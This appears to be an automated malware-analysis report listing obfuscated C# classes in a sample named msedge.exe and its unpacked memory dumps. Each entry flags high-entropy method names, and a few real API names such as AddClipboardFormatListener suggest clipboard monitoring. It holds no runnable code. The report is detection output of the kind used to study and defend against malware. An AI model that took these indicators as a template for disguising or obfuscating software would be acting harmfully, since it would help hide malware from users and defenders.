Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: msedge.exe.0.dr, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: msedge.exe.0.dr, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: msedge.exe.0.dr, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: msedge.exe.0.dr, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: msedge.exe.0.dr, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
